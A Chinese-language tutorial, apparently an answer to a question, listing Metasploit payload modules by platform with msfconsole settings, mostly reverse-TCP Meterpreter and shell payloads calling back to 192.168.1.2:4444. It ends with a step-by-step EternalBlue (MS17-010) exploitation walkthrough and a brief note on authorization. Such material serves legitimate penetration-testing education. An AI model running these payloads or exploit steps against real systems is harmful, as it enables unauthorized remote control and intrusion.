Bootstrap

metasploit/modules/payloads 有哪些模块,以及具体使用案例

Metasploit框架的payloads模块用于定义在成功利用漏洞后执行的代码。以下是一些常见的payloads模块及其使用案例:

1. Windows Payloads

  • windows/meterpreter/reverse_tcp:反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • windows/exec:执行单个命令。

    set PAYLOAD windows/exec
    set CMD "calc.exe"
    

2. Linux Payloads

  • linux/x86/meterpreter/reverse_tcp:反向TCP Meterpreter会话。

    set PAYLOAD linux/x86/meterpreter/reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • linux/x86/exec:执行单个命令。

    set PAYLOAD linux/x86/exec
    set CMD "ls -la"
    

3. Web应用Payloads

  • php/meterpreter/reverse_tcp:反向TCP Meterpreter会话。

    set PAYLOAD php/meterpreter/reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • php/exec:执行单个PHP命令。

    set PAYLOAD php/exec
    set CMD "phpinfo();"
    

4. Android Payloads

  • android/meterpreter/reverse_tcp:反向TCP Meterpreter会话。

    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • android/shell/reverse_tcp:反向TCP Shell会话。

    set PAYLOAD android/shell/reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 4444
    

5. 其他 Payloads

  • generic/shell_bind_tcp:绑定TCP Shell会话。

    set PAYLOAD generic/shell_bind_tcp
    set RPORT 1234
    
  • generic/shell_reverse_tcp:反向TCP Shell会话。

    set PAYLOAD generic/shell_reverse_tcp
    set LHOST 192.168.1.2
    set LPORT 4444
    

使用案例

假设你想利用一个Windows漏洞来获取远程控制,你可以按照以下步骤操作:

  1. 选择合适的exploit模块

    use exploit/windows/smb/ms17_010_eternalblue
    
  2. 设置目标IP

    set RHOSTS 192.168.1.1
    
  3. 选择合适的payload模块

    set PAYLOAD windows/meterpreter/reverse_tcp
    
  4. 设置本地监听地址和端口

    set LHOST 192.168.1.2
    set LPORT 4444
    
  5. 运行模块

    run
    

注意事项

  • 使用这些模块时,请确保你有合法的权限和目的。
  • 避免在未经授权的系统上进行测试,以免违反法律或政策。

通过这些模块和案例,你可以定义在成功利用漏洞后执行的代码,从而获取远程控制或执行特定任务。

;